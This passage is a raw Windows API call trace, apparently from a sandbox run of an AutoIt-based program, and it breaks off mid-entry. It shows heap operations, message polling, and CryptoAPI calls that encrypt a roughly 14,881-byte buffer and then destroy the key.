RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.577] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.577] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.577] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.577] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.578] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.578] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.578] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3a10, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3a20) returned 1 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.578] CharLowerBuffW (in: lpsz="byte[14881]", cchLength=0xb | out: lpsz="byte[14881]") returned 0xb [0035.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.579] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.579] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95fe60*, pdwDataLen=0x6ae220*=0x3a10, dwBufLen=0x3a20 | out: pbData=0x95fe60*, pdwDataLen=0x6ae220*=0x3a20) returned 1 [0035.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.581] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.581] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.584] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.584] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.584] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.584] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.585] CryptDestroyKey (hKey=0x7c2200) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.585] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.585] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.585] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.585] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.585] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.586] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.586] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.586] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.586] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.586] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.586] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.587] CharLowerBuffW (in: 